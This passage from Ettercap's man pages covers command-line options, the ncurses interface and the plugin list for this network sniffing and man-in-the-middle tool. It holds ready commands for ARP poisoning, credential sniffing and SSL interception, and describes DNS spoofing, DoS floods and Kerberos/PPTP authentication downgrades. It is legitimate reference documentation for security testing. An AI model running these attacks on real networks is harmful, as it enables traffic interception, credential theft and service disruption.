ARP storm at startup any time you use ettercap. Simply use this options and dump the list to a file, then to load the information from it use the \-j option. .TP \fB\-P\fR, \fB\-\-plugin \fR Run the selected PLUGIN. Many plugins need target specification, use TARGET as always. Use multiple occurrences of this parameter to select multiple plugins. .br In console mode (\-C option), standalone plugins are executed and then the application exits. Hook plugins are activated and the normal sniffing is performed. .br To have a list of the available external plugins use "list" (without quotes) as plugin name (e.g. ./ettercap \-P list). .Sp NOTE: you can also activate plugins directly from the interfaces (always press "h" to get the inline help) .Sp More detailed info about plugins and about how to write your own are found in the man page ettercap_plugins(8) .TP \fB\-\-plugin-list [,,...]\fR Instead of providing multiple occurances of \-P plugin, \-\-plugin-list can be used followed by a comma sepaparated list without any spaces. (e.g. ./ettercap \-\-plugin-list plugin1,plugin2). .TP \fB\-F\fR, \fB\-\-filter \fR Load the filter from the file . The filter must be compiled with etterfilter(8). The utility will compile the filter script and produce an ettercap\-compliant binary filter file. Read the etterfilter(8) man page for the list of functions you can use inside a filter script. Any number of filters can be loaded by specifying the option multiple times; packets are passed through each filter in the order specified on the command line. You can also load a script without enabling it by appending :0 to the filename. .br NOTE: these filters are different from those set with \-\-pcapfilter. An ettercap filter is a content filter and can modify the payload of a packet before forwarding it. Pcap filter are used to capture only certain packets. .br NOTE: you can use filters on pcapfile to modify them and save to another file, but in this case you have to pay attention on what you are doing, since ettercap will not recalculate checksums, nor split packets exceeding the mtu (snaplen) nor anything like that. .TP \fB\-W\fR, \fB\-\-wifi\-key \fR You can specify a key to decrypt WiFi packets (WEP or WPA). Only the packets decrypted successfully will be passed to the decoders stack, the others will be skipped with a message. .br The parameter has the following syntax: type:bits:t:string. Where 'type' can be: wep, wpa-pws or wpa-psk, 'bits' is the bit length of the key (64, 128 or 256), 't' is the type of the string ('s' for string and 'p' for passphrase). 'string' can be a string or an escaped hex sequences. .Sp example: .br \-\-wifi\-key wep:128:p:secret .br \-\-wifi\-key wep:128:s:ettercapwep0 .br \-\-wifi\-key 'wep:64:s:\\x01\\x02\\x03\\x04\\x05' .br \-\-wifi\-key wpa:pwd:ettercapwpa:ssid .br \-\-wifi\-key wpa:psk: .br 663eb260e87cf389c6bd7331b28d82f5203b0cae4e315f9cbb7602f3236708a6 .TP \fB\-a\fR, \fB\-\-config \fR Loads an alternative config file instead of the default in /etc/etter.conf. This is useful if you have many preconfigured files for different situations. .TP \fB\-\-certificate \fR Tells Ettercap to use the specified certificate file for the SSL MiTM attack. .TP \fB\-\-private\-key \fR Tells Ettercap to use the specified private key file for the SSL MiTM attack. .TP .B VISUALIZATION OPTIONS .TP \fB\-e\fR, \fB\-\-regex \fR Handle only packets that match the regex. .br This option is useful in conjunction with \-L. It logs only packets that match the posix regex REGEX. .br It impacts even the visualization of the sniffed packets. If it is set only packets matching the regex will be displayed. .TP \fB\-V\fR, \fB\-\-visual \fR Use this option to set the visualization method for the packets to be displayed. .Sp FORMAT may be one of the following: .Sp .RS .TP \fBhex\fR Print the packets in hex format. .Sp example: .Sp the string "HTTP/1.1 304 Not Modified" becomes: .Sp 0000: 4854 5450 2f31 2e31 2033 3034 204e 6f74 HTTP/1.1 304 Not .br 0010: 204d 6f64 6966 6965 64 Modified .TP \fBascii\fR Print only "printable" characters, the others are displayed as dots '.' .TP \fBtext\fR Print only the "printable" characters and skip the others. .TP \fBebcdic\fR Convert an EBCDIC text to ASCII. .TP \fBhtml\fR Strip all the html tags from the text. A tag is every string between < and >. .Sp example: .Sp This is the title, but the following will not be displayed. .Sp This is the title, but the following will not be displayed. .TP \fButf8\fR Print the packets in UTF-8 format. The encoding used while performing the conversion is declared in the etter.conf(5) file. .RE .TP \fB\-d\fR, \fB\-\-dns\fR Resolve ip addresses into hostnames. .Sp NOTE: this may seriously slow down ettercap while logging passive information. Every time a new host is found, a query to the dns is performed. Ettercap keeps a cache for already resolved host to increase the speed, but new hosts need a new query and the dns may take up to 2 or 3 seconds to respond for an unknown host. .Sp HINT: ettercap collects the dns replies it sniffs in the resolution table, so even if you specify to not resolve the hostnames, some of them will be resolved because the reply was previously sniffed. think about it as a passive dns resolution for free... ;) .TP \fB\-E\fR, \fB\-\-ext\-headers\fR Print extended headers for every displayed packet. (e.g. mac addresses) .TP \fB\-Q\fR, \fB\-\-superquiet\fR Super quiet mode. Do not print users and passwords as they are collected. Only store them in the profiles. It can be useful to run ettercap in text only mode but you don't want to be flooded with dissectors messages. Useful when using plugins because the sniffing process is always active, it will print all the collected infos, with this option you can suppress these messages. .br NOTE: this options automatically sets the \-q option. .Sp example: .Sp ettercap \-TzQP finger /192.168.0.1/22 .TP .B LOGGING OPTIONS .TP \fB\-L\fR, \fB\-\-log \fR Log all the packets to binary files. These files can be parsed by etterlog(8) to extract human readable data. With this option, all packets sniffed by ettercap will be logged, together with all the passive info (host info + user & pass) it can collect. Given a LOGFILE, ettercap will create LOGFILE.ecp (for packets) and LOGFILE.eci (for the infos). .Sp NOTE: if you specify this option on command line you don't have to take care of privileges since the log file is opened in the startup phase (with high privs). But if you enable the log option while ettercap is already started, you have to be in a directory where uid = 65535 or uid = EC_UID can write. .Sp NOTE: the logfiles can be compressed with the deflate algorithm using the \-c option. .TP \fB\-l\fR, \fB\-\-log\-info \fR Very similar to \-L but it logs only passive information + users and passwords for each host. The file will be named LOGFILE.eci .TP \fB\-m\fR, \fB\-\-log\-msg \fR It stores in all the user messages printed by ettercap. This can be useful when you are using ettercap in daemon mode or if you want to track down all the messages. Indeed, some dissectors print messages but their information is not stored anywhere, so this is the only way to keep track of them. .TP \fB\-c\fR, \fB\-\-compress\fR Compress the logfile with the gzip algorithm while it is dumped. etterlog(8) is capable of handling both compressed and uncompressed log files. .TP \fB\-o\fR, \fB\-\-only\-local\fR Stores profiles information belonging only to the LAN hosts. .Sp NOTE: this option is effective only against the profiles collected in memory. While logging to a file ALL the hosts are logged. If you want to split them, use the related etterlog(8) option. .TP \fB\-O\fR, \fB\-\-only\-remote\fR Stores profiles information belonging only to remote hosts. .TP .B STANDARD OPTIONS .TP \fB\-v\fR, \fB\-\-version\fR Print the version and exit. .TP \fB\-h\fR, \fB\-\-help\fR prints the help screen with a short summary of the available options. .SH EXAMPLES Here are some examples of using ettercap. .TP .B ettercap \-Tp .Sp Use the console interface and do not put the interface in promisc mode. You will see only your traffic. .TP .B ettercap \-Tzq .Sp Use the console interface, do not ARP scan the net and be quiet. The packet content will not be displayed, but user and passwords, as well as other messages, will be displayed. .TP .B ettercap \-T \-j /tmp/victims \-M arp /10.0.0.1\-7/ /10.0.0.10\-20/ .Sp Will load the hosts list from /tmp/victims and perform an ARP poisoning attack against the two target. The list will be joined with the target and the resulting list is used for ARP poisoning. .TP .B ettercap \-T \-M arp // // .Sp Perform the ARP poisoning attack against all the hosts in the LAN. BE CAREFUL !! .TP .B ettercap \-T \-M arp:remote /192.168.1.1/ /192.168.1.2\-10/ .Sp Perform the ARP poisoning against the gateway and the host in the lan between 2 and 10. The 'remote' option is needed to be able to sniff the remote traffic the hosts make through the gateway. .TP .B ettercap \-Tzq //110 .Sp Sniff only the pop3 protocol from every hosts. .TP .B ettercap \-Tzq /10.0.0.1/21,22,23 .Sp Sniff telnet, ftp and ssh connections to 10.0.0.1. .TP .B ettercap \-P list .Sp Prints the list of all available plugins .SH FILES .TP .B ~/.config/ettercap_gtk .Sp Stores persistent information (e.g., window placement) between sessions. .SH ORIGINAL AUTHORS Alberto Ornaghi (ALoR) .br Marco Valleri (NaGA) .SH PROJECT STEWARDS Emilio Escobar (exfil) .br Eric Milam (Brav0Hax) .SH OFFICIAL DEVELOPERS Mike Ryan (justfalter) .br Gianfranco Costamagna (LocutusOfBorg) .br Antonio Collarino (sniper) .br Ryan Linn .br Jacob Baines .SH CONTRIBUTORS Dhiru Kholia (kholia) .br Alexander Koeppe (koeppea) .br Martin Bos (PureHate) .br Enrique Sanchez .br Gisle Vanem .br Johannes Bauer .br Daten (Bryan Schneiders) .SH "SEE ALSO" .I "etter.conf(5)" .I "ettercap_curses(8)" .I "ettercap_plugins(8)" .I "etterlog(8)" .I "etterfilter(8)" .I "ettercap\-pkexec(8)" .LP .SH AVAILABILITY https://github.com/Ettercap/ettercap/downloads .SH GIT git clone git://github.com/Ettercap/ettercap.git .br or .br git clone https://github.com/Ettercap/ettercap.git .SH BUGS Our software never has bugs. .br It just develops random features. ;) .PP .B KNOWN-BUGS .PP - ettercap doesn't handle fragmented packets... only the first segment will be displayed by the sniffer. However all the fragments are correctly forwarded. .PP + please send bug-report, patches or suggestions to or visit https://github.com/Ettercap/ettercap/issues. .PP + to report a bug, follow the instructions in the README.BUGS file .SH PHILOLOGICAL HISTORY "Even if blessed with a feeble intelligence, they are cruel and smart..." this is the description of Ettercap, a monster of the RPG Advanced Dungeons & Dragon. .PP The name "ettercap" was chosen because it has an assonance with "ethercap" which means "ethernet capture" (what ettercap actually does) and also because such monsters have a powerful poison... and you know, arp poisoning... ;) .SH The Lord Of The (Token)Ring (the fellowship of the packet) .PP "One Ring to link them all, One Ring to ping them, .br one Ring to bring them all and in the darkness sniff them." .SH Last words "Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." - Rich Cook ettercap-0.8.3.1/man/ettercap_curses.8.in000664 000000 000000 00000027174 13711276346 020141 0ustar00rootroot000000 000000 .\" ettercap_curses -- man page for the Ncurses GUI .\" .\" This program is free software; you can redistribute it and/or modify .\" it under the terms of the GNU General Public License as published by .\" the Free Software Foundation; either version 2 of the License, or .\" (at your option) any later version. .\" .\" This program is distributed in the hope that it will be useful, .\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\" GNU General Public License for more details. .\" .\" You should have received a copy of the GNU General Public License .\" along with this program; if not, write to the Free Software .\" Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. .\" .\" .de Sp .if n .sp .if t .sp 0.4 .. .TH ETTERCAP-CURSES "8" "" "ettercap @VERSION@" .SH NAME ettercap - Man page for the Ncurses GUI. .SH GENERAL DESCRIPTION The curses GUI is quite simple and intuitive. .br It is menu-driven. Every flag or function can be modified/called through the upper menu. All user messages are printed in the bottom window. If you want to see the old messages, you can scroll the window buffer by pressing the UP, DOWN, PPAGE, NPAGE keys. The middle part is used to display information or dialogs for the user. .Sp The menus can be opened by pressing the relative hotkey. For the menus the hotkey is represented by the uppercase initial letter of the title (e.g. 'S' for Sniffing, 'T' for Targets). The functions within a menu can be called by pressing the hotkey depicted near the function name on the right. Hotkeys prefixed with 'C-' are to be used in conjunction with the CTRL key (e.g. 'C-f' means CTRL+f). .Sp You can switch the focus between the objects on the screen by pressing the TAB key or by clicking on it with the mouse (if you are running ettercap within an xterm). Mouse events are supported only through the xterm. You can use the mouse to select objects, open a menu, choose a function, scroll the elevators for the scrolling windows, etc etc. .Sp When you open multiple windows in the middle part, they will overlap. Use the TAB key to switch between them. Use CTRL+Q to close the focused window. .br You can also use CTRL+Q to close the input dialog if you want to cancel the requested input. (i.e. you have selected the wrong function and you want to go back). .Sp To have a quick help on the shortcuts you can use against a particular window press the SPACE key. A help window will be displayed with a list of shortcuts that can be used. If the window does not appear, no shortcuts are available. .SH HOW TO SELECT IT To use the ncurses GUI you have to: .Sp - compile ettercap with ncurses support (obviously) .br - run it with the \-C flag .Sp Passing the \-C flag is sufficient, but if you want you can pass other flags that will be automatically set for the ncurses GUI. You will be able to override them using the menu to change the options. .SH ONCE STARTED As soon as ettercap is launched with the Ncurses GUI, you will be prompted with multiple choices. The first screen lets you select if you want to open a pcap file or dump the sniffed traffic to a file, if you want unified sniffing or bridged one, permits you to set a pcap file on the captured traffic and enables you to log all the sniffed data. .Sp Once you have selected a sniffing method (from file, unified or bridged) this screen will not be reachable anymore. The only way is to restart ettercap. Let's analyze each menu in the start screen: .TP .B File .RS .TP .B Open... Open a pcap file and analyze it. All the functionalities available for live sniffing are in place except for those sending or forwarding packets (mitm attacks and so on...). .TP .B Dump to file... All the traffic sniffed by the live capture will be dumped to that file. The filters, not the targets, have effects on this file, as all the packets received by pcap will be dumped. The only way to not dump a certain packet is to set a proper pcap filter (see below). .TP .B Exit .br Exits from ettercap and returns to the command prompt. .RE .TP .B Sniff .RS .TP .B Unified sniffing... Choosing this function you will be prompted to select the network interface to be used for sniffing. The first up and running interface is suggested in the input box. For an explanation of what unified sniffing is, refer to ettercap(8). .br TIP: if you use the 'u' hotkey, this step will be skipped and the default interface is automatically selected. .TP .B Bridged sniffing... After selecting the two interfaces to be used, you will enter the Bridged sniffing mode. For an explanation of what bridged sniffing is, refer to ettercap(8). .TP .B Set pcap filter... Here you can insert a tcpdump-like filter for the capturing process. .br IMPORTANT: if you manage to use a mitm attack, remember that if ettercap does not see a packet, it will NOT be forwarded. So be sure of what you are doing by setting a pcap filter. .RE .TP .B Options .RS .TP .B Unoffensive This enable/disable the unoffensive flag. The asterisk '*' means "the option is enabled". Otherwise the option is not enabled. .TP .B Promisc mode Enable/disable the promisc mode for the live capture on a network interface. This is an "asterisk-option" as the unoffensive one. .TP .B Set netmask Use the specified netmask instead of the one associated with the current iface. This option is useful if you have the NIC with an associated netmask of class B and you want to scan (with the arp scan) only a C class. .RE .SH THE INTERESTING PART Once you have selected an offline sniffing or a live capture, the upper menu is modified and you can start to do the interesting things... .br Some of the following menu are only available in live capture. .TP .B Start .RS .TP .B Start sniffing Starts the sniffing process depending on what you have selected on startup (live or from file) .TP .B Stop sniffing Stops the sniffing thread. .TP .B Exit .br Returns to your favourite shell ;) .RE .TP .B Targets .RS .TP .B Current Targets Displays a list of hosts in each TARGET. You can selectively remove a host by selecting it and press 'd' or add a new host pressing 'a'. To switch between the two lists, use the ARROWS keys. .TP .B Select TARGET(s) Lets you select the TARGET(s) as explained in ettercap(8). The syntax is the same as for the command line specification. .TP .B Protocol... You can choose to sniff only TCP, only UDP or both (ALL). .TP .B Reverse matching Reverse the matching of a packet. It is equivalent to a NOT before the target specification. .TP .B Wipe Targets Restores both TARGETS to ANY/ANY/ANY .RE .TP .B Hosts .RS .TP .B Hosts list Displays the list of hosts detected through an ARP scan or converted from the passive profiles. This list is used by MITM attacks when the ANY target is selected, so if you want to exclude a host from the attack, simply delete it from the list. .br You can remove a host from the list by pressing 'd', add it to TARGET1 by pressing '1' or add it to TARGET2 by pressing '2'. .TP .B Scan for hosts Perform the ARP scan of the netmask if no TARGETS are selected. If TARGETS was specified it only scans for those hosts. .TP .B Load from file... Loads the hosts list from a file previously saved with "save to file" or hand crafted. .TP .B Save to file... Save the current hosts list to a file. .RE .TP .B View .RS .TP .B Connections Displays the connection list. To see detailed information about a connection press 'd', or press 'k' to kill it. To see the traffic for a specific connection, select it and press enter. Once the two-panel interface is displayed you can move the focus with the arrow keys. Press 'j' to switch between joined and split visualization. Press 'k' to kill the connection. Press 'y' to inject interactively and 'Y' to inject a file. Note that it is important which panel has the focus as the injected data will be sent to that address. .br HINT: connections marked with an asterisk contain account(s) information. .TP .B Profiles Displays the passive profile hosts list. Selecting a host will display the relative details (including account with user and pass for that host). .br You can convert the passive profile list into the hosts list by pressing 'c'. To purge remote hosts, press 'l'. To purge local hosts, press 'r'. You can also dump the current profile to a file by pressing 'd'; the dumped file can be opened with etterlog(8). .br HINT: profiles marked with an asterisk contain account(s) information. .TP .B Statistics Displays some statistics about the sniffing process. .TP .B Resolve IP addresses Enables DNS resolution for all the sniffed IP address. CAUTION: this will extremely slow down ettercap. By the way the passive dns resolution is always active. It sniffs dns replies and stores them in a cache. If an ip address is present in that cache, it will be automatically resolved. It is dns resolution for free... ;) .TP .B Visualization method Change the visualization method for the sniffed data. Available methods: ascii, hex, ebcdic, text, html. .TP .B Visualization regex Set the visualization regular expression. Only packets matching this regex will be displayed in the connection data window. .TP .B Set the WiFi key Set the WiFi key used to decrypt WiFi encrypted packets. See ettercap(8) for the format of the key. .RE .TP .B Mitm .RS .TP .B [...] For each type of attack, a menu entry is displayed. Simply select the attack you want and fill the arguments when asked. You can activate more than one attack at a time. .TP .B Stop mitm attack(s) Stops all the mitm attacks currently active. .RE .TP .B Filters .RS .TP .B Load a filter... Load a precompiled filter file. The file must be compiled with etterfilter(8) before it can be loaded. .TP .B Stop filtering Unload the filter and stop filtering the connections. .RE .TP .B Logging .RS .TP .B Log all packets and infos... Given a file name, it will create two files: filename.eci (for information about hosts) and filename.ecp (for all the interesting packets). This is the same as the \-L option. .TP .B Log only infos... This is used only to sniff information about hosts (same as the \-l option). .TP .B Stop logging info Come on... it is self explanatory. .TP .B Log user messages... Will log all the messages appearing in the bottom window (same as \-m option). .TP .B Compressed file Asterisk-option to control whether or not the logfile should be compressed. .RE .TP .B Plugins .RS .TP .B Manage the plugins Opens the plugin management window. You can select a plugin and activate it by pressing 'enter'. Plugins already active can be recognized by the [1] symbol instead of [0]. If you select an active plugin, it will be deactivated. .TP .B Load a plugin... You can load a plugin file that is not in the default search path. (remember that you can browse directories with EC_UID permissions). .RE .SH ORIGINAL AUTHORS Alberto Ornaghi (ALoR) .br Marco Valleri (NaGA) .SH PROJECT STEWARDS Emilio Escobar (exfil) .br Eric Milam (Brav0Hax) .SH OFFICIAL DEVELOPERS Mike Ryan (justfalter) .br Gianfranco Costamagna (LocutusOfBorg) .br Antonio Collarino (sniper) .br Ryan Linn .br Jacob Baines .SH CONTRIBUTORS Dhiru Kholia (kholia) .br Alexander Koeppe (koeppea) .br Martin Bos (PureHate) .br Enrique Sanchez .br Gisle Vanem .br Johannes Bauer .br Daten (Bryan Schneiders) .SH "SEE ALSO" .I "ettercap(8)" .I "ettercap_plugins(8)" .I "etterlog(8)" .I "etterfilter(8)" .I "etter.conf(5)" .I "ettercap\-pkexec(8)" .LP ettercap-0.8.3.1/man/ettercap_plugins.8.in000664 000000 000000 00000046773 13711276346 020324 0ustar00rootroot000000 000000 .\" ettercap_plugins -- man page for all the plugins .\" .\" This program is free software; you can redistribute it and/or modify .\" it under the terms of the GNU General Public License as published by .\" the Free Software Foundation; either version 2 of the License, or .\" (at your option) any later version. .\" .\" This program is distributed in the hope that it will be useful, .\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\" GNU General Public License for more details. .\" .\" You should have received a copy of the GNU General Public License .\" along with this program; if not, write to the Free Software .\" Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. .\" .\" .de Sp .if n .sp .if t .sp 0.4 .. .TH ETTERCAP-PLUGINS "8" "" "ettercap @VERSION@" .SH NAME ettercap-plugins - A collection of plugins for ettercap .SH DESCRIPTION Ettercap(8) supports loadable modules at runtime. They are called plugins and they come within the source tarball. They are automatically compiled if your system supports them or until you specify \-DENABLE_PLUGINS=OFF option to the cmake configure script. .br Some of older ettercap plugins (roper, banshee, and so on) have not been ported in the new version. By the way, you can achieve the same results by using new filtering engine. .br If you use interactive mode, most plugins need to "Start Sniff" before using them. .TP To have a list of plugins installed in your system do that command: .Sp .I ettercap \-P list .LP .LP The following is a list of available plugins: .TP .B arp_cop .Sp It reports suspicious ARP activity by passively monitoring ARP requests/replies. It can report ARP posioning attempts, or simple IP-conflicts or IP-changes. If you build the initial host list the plugin will run more accurately. .Sp .I example : .Sp ettercap \-TQP arp_cop // .TP .B autoadd .Sp It will automatically add new victims to the ARP poisoning mitm attack when they come up. It looks for ARP requests on the lan and when detected it will add the host to the victims list if it was specified in the TARGET. The host is added when an arp request is seen form it, since communicating hosts are alive :) .TP .B chk_poison .Sp It performs a check to see if the arp poisoning module of ettercap was successful. It sends spoofed ICMP echo packets to all the victims of the poisoning pretending to be each of the other targets. If we can catch an ICMP reply with our MAC address as destination it means that the poisoning between those two targets is successful. It checks both ways of each communication. This plugin makes sense only where poisoning makes sense. The test fails if you specify only one target in silent mode. You can't run this plugin from command line because the poisoning process is not started yet. You have to launch it from the proper menu. .TP .B dns_spoof .Sp This plugin intercepts DNS query and reply with a spoofed answer. You can choose to which addresses the plugin has to reply, and the expiry time in seconds (TTL) by modifying the etter.dns file. The plugin intercepts A, AAAA, PTR, MX, WINS, SRV and TXT request. If it was an A request, the name is searched in the file and the IP address is returned (you can use wildcards in the name). .br The same applies if it was a AAAA request. .Sp TTL is an optional field which is specified as the last option in an entry in the etter.dns file. The TTL is specified in a number of seconds from 0 to 2^31-1 (see RFC 2181). TTL is specified on a per-host basis. If the TTL is not specified for a particular host, the default value is 3600 seconds (1 hour). .Sp If it was a PTR request, the IP address is searched in the file and the name is returned (except for those name containing a wildcard). For PTR requests, IPv4 or IPv6 addresses are supported. .Sp In case of MX request a special reply is crafted. The host is resolved with a fake host 'mail.host' and the additional record contains the IP address of 'mail.host'. The first address that matches is returned, so be careful with the order. The IP address for MX requests can be a IPv4 or a IPv6 address. .Sp If the request was a WINS request, the name is searched in the file and the IP address is returned. .Sp In case of SRV request, a special reply is crafted. The host is resolved with a fake host 'srv.host' and the additional record contains the IP address of 'srv.host'. The IP address for SRV requests can be a IPv4 or a IPv6 address. .Sp In case of a TXT request, the string defined is being returned. The string has to be wrapped in double quotes. Wildcards for the requested name can also be used. .Sp A special reply can be spoofed for A or AAAA requests, if the 'undefined address' is specified as the IP address in the file. Then the client gets a response which stops resolution processing immediately. This way one can control which address family is being used to access a dual-stacked host. .Sp In the case of an ANY request, all matching results of type A, AAAA, MX and TXT are returned in the reply. If the 'undefined address' for A or AAAA records is defined, nothing is returned for these types whether or not the name matches. .TP .B mdns_spoof .Sp This plugin does the same as the dns_spoof plugin described above, despite that it listens for mDNS (Multicast DNS) queries on UDP port 5353. To choose to which address the plugin shall reply, you have to modify a diffent file called etter.mdns. Due to the nature of mDNS, the plugin intercepts only A, AAAA, PTR and SRV requests. .Sp The way the mdns_spoof plugin interprets the etter.mdns file and the rules that apply are the same as with the dns_spoof plugin, although currently the mdns_spoof plugin lacks support for custom TTL. The TTL for all spoofed mDNS replies is 3600 seconds (1 hour). .TP .B dos_attack .Sp This plugin runs a d.o.s. attack against a victim IP address. It first "scans" the victim to find open ports, then starts to flood these ports with SYN packets, using a "phantom" address as source IP. Then it uses fake ARP replies to intercept packets for the phantom host. When it receives SYN-ACK from the victim, it replies with an ACK packet creating an ESTABLISHED connection. You have to use a free IP address in your subnet to create the "phantom" host (you can use find_ip for this purpose). You can't run this plugin in unoffensive mode. .br This plugin is based on the original Naptha DoS attack (http://razor.bindview.com/publish/advisories/adv_NAPTHA.html) .Sp .I example : .Sp ettercap \-TQP dos_attack .TP .B dummy .Sp Only a template to demonstrate how to write a plugin. .TP .B find_conn .Sp Very simple plugin that listens for ARP requests to show you all the targets an host wants to talk to. It can also help you finding addresses in an unknown LAN. .Sp .I example : .Sp ettercap \-TQzP find_conn .Sp ettercap \-TQu \-i eth0 \-P find_conn .TP .B find_ettercap .Sp Try to identify ettercap packets sent on the LAN. It could be useful to detect if someone is using ettercap. Do not rely on it 100% since the tests are only on particular sequence/identification numbers. .TP .B find_ip .Sp Find the first unused IP address in the range specified by the user in the target list. Some other plugins (such as gre_relay) need an unused IP address of the LAN to create a "fake" host. It can also be useful to obtain an IP address in an unknown LAN where there is no dhcp server. You can use find_conn to determine the IP addressing of the LAN, and then find_ip. You have to build host list to use this plugin so you can't use it in unoffensive mode. If you don't have an IP address for your interface, give it a bogus one (e.g. if the LAN is 192.168.0.0/24, use 10.0.0.1 to avoid conflicting IP), then launch this plugin specifying the subnet range. You can run it either from the command line or from the proper menu. .Sp .I example : .Sp ettercap \-TQP find_ip // .Sp ettercap \-TQP find_ip /192.168.0.1\-254/ .TP .B finger .Sp Uses the passive fingerprint capabilities to fingerprint a remote host. It does a connect() to the remote host to force the kernel to reply to the SYN with a SYN+ACK packet. The reply will be collected and the fingerprint is displayed. The connect() obey to the connect_timeout parameter in etter.conf(5). You can specify a target on command-line or let the plugin ask the target host to be fingerprinted. You can also specify multiple target with the usual multi-target specification (see ettercap(8)). if you specify multiple ports, all the ports will be tested on all the IPs. .Sp .I example : .Sp ettercap \-TzP finger /192.168.0.1/22 .br ettercap \-TzP finger /192.168.0.1\-50/22,23,25 .TP .B finger_submit .Sp Use this plugin to submit a fingerprint to the ettercap website. If you found an unknown fingerprint, but you know for sure the operating system of the target, you can submit it so it will be inserted in the database in the next ettercap release. We need your help to increase the passive fingerprint database. Thank you very much. .Sp .I example : .Sp ettercap \-TzP finger_submit .TP .B fraggle_attack .Sp This plugin performs a DoS attack because it sends a large amount of UDP echo and chargen traffic to all hosts in target2 with a fake source ip address (victim). .Sp .I example (192.168.0.5 is the victim): .Sp ettercap \-i eth1 \-Tq /192.168.0.5/ // \-P fraggle_attack .TP .B gre_relay .Sp This plugin can be used to sniff GRE-redirected remote traffic. The basic idea is to create a GRE tunnel that sends all the traffic on a router interface to the ettercap machine. The plugin will send back the GRE packets to the router, after ettercap "manipulation" (you can use "active" plugins such as smb_down, ssh decryption, filters, etc... on redirected traffic) It needs a "fake" host where the traffic has to be redirected to (to avoid kernel's responses). The "fake" IP will be the tunnel endpoint. Gre_relay plugin will impersonate the "fake" host. To find an unused IP address for the "fake" host you can use find_ip plugin. Based on the original Tunnelx technique by Anthony C. Zboralski (http://www.phrack.org/archives/issues/56/10.txt). .TP .B gw_discover .Sp This plugin try to discover the gateway of the lan by sending TCP SYN packets to a remote host. The packet has the destination IP of a remote host and the destination mac address of a local host. If ettercap receives the SYN+ACK packet, the host which own the source mac address of the reply is the gatway. This operation is repeated for each host in the 'host list', so you need to have a valid host list before launching this plugin. .Sp .I example : .Sp ettercap \-TP gw_discover /192.168.0.1\-50/ .TP .B isolate .Sp The isolate plugin will isolate an host form the LAN. It will poison the victim's arp cache with its own mac address associated with all the host it tries to contact. This way the host will not be able to contact other hosts because the packet will never reach the wire. .br You can specify all the host or only a group. the targets specification work this way: the target1 is the victim and must be a single host, the target2 can be a range of addresses and represent the hosts that will be blocked to the victim. .Sp .I examples : .Sp ettercap \-TzqP isolate /192.168.0.1/ // .br ettercap \-TP isolate /192.168.0.1/ /192.168.0.2\-30/ .TP .B krb5_downgrade .Sp It downgrades Kerberos V5 security by modifying the etype values in client AS-REQ packets. This way, obtained hashes can be easily cracked by John the Ripper (JtR). You have to be in the "middle" of the connection to successfully use it. It hooks the kerberos dissector, so you have to keep it active. .TP .B link_type .Sp It performs a check of the link type (hub or switch) by sending a spoofed ARP request and listening for replies. It needs at least one entry in the host list to perform the check. With two or more hosts the test will be more accurate. .Sp .I example : .Sp ettercap \-TQP link_type /192.168.0.1/ .br ettercap \-TQP link_type // .TP .B pptp_chapms1 .Sp It forces the pptp tunnel to negotiate MS-CHAPv1 authentication instead of MS-CHAPv2, that is usually easier to crack (for example with LC4). You have to be in the "middle" of the connection to use it successfully. It hooks the ppp dissector, so you have to keep them active. .TP .B pptp_clear .Sp Forces no compression/encryption for pptp tunnels during negotiation. It could fail if client (or the server) is configured to hang off the tunnel if no encryption is negotiated. You have to be in the "middle" of the connection to use it successfully. It hooks the ppp dissector, so you have to keep them active. .TP .B pptp_pap .Sp It forces the pptp tunnel to negotiate PAP (cleartext) authentication. It could fail if PAP is not supported, if pap_secret file is missing, or in case windows is configured with "authomatic use of domain account". (It could fail for many other reasons too). You have to be in the "middle" of the connection to use it successfully. It hooks the ppp dissector, so you have to keep them active. .TP .B pptp_reneg .Sp Forces re-negotiation on an existing pptp tunnel. You can force re-negotiation for grabbing passwords already sent. Furthermore you can launch it to use pptp_pap, pptp_chapms1 or pptp_clear on existing tunnels (those plugins work only during negotiation phase). You have to be in the "middle" of the connection to use it successfully. It hooks the ppp dissector, so you have to keep them active. .TP .B rand_flood .Sp Floods the LAN with random MAC addresses. Some switches will fail open in repeating mode, facilitating sniffing. The delay between each packet is based on the port_steal_send_delay value in etter.conf. .br It is useful only on ethernet switches. .Sp .I example : .Sp ettercap \-TP rand_flood .TP .B remote_browser .Sp It sends to the browser the URLs sniffed thru HTTP sessions. So you are able to see the webpages in real time. The command executed is configurable in the etter.conf(5) file. It sends to the browser only the GET requests and only for webpages, ignoring single request to images or other amenities. Don't use it to view your own connection :) .TP .B reply_arp .Sp Simple arp responder. When it intercepts an arp request for a host in the targets' lists, it replies with attacker's MAC address. .Sp .I example : .Sp ettercap \-TQzP reply_arp /192.168.0.1/ .br ettercap \-TQzP reply_arp // .TP .B repoison_arp .Sp It solicits poisoning packets after broadcast ARP requests (or replies) from a posioned host. For example: we are poisoning Group1 impersonating Host2. If Host2 makes a broadcast ARP request for Host3, it is possible that Group1 caches the right MAC address for Host2 contained in the ARP packet. This plugin re-poisons Group1 cache immediately after a legal broadcast ARP request (or reply). .br This plugin is effective only during an arp-posioning session. .br In conjunction with the reply_arp plugin, repoison_arp is a good support for the standard arp-poisoning mitm method. .Sp .I example : .Sp ettercap \-T \-M arp:remote \-P repoison_arp /192.168.0.10\-20/ /192.168.0.1/ .TP .B scan_poisoner .Sp Check if someone is poisoning between some host in the list and us. First of all it checks if two hosts in the list have the same mac address. It could mean that one of those is poisoning us pretending to be the other. It could generate many false-positives in a proxy-arp environment. You have to build hosts list to perform this check. After that, it sends icmp echo packets to each host in the list and checks if the source mac address of the reply differs from the address we have stored in the list for that ip. It could mean that someone is poisoning that host pretending to have our ip address and forwards intercepted packets to us. You can't perform this active test in unoffensive mode. .Sp .I example : .Sp ettercap \-TQP scan_poisoner // .TP .B search_promisc .Sp It tries to find if anyone is sniffing in promisc mode. It sends two different kinds of malformed arp request to each target in the host list and waits for replies. If a reply arrives from the target host, it's more or less probable that this target has the NIC in promisc mode. It could generate false-positives. You can launch it either from the command line or from the plugin menu. Since it listens for arp replies it is better that you don't use it while sending arp request. .Sp .I example : .Sp ettercap \-TQP search_promisc /192.168.0.1/ .br ettercap \-TQP 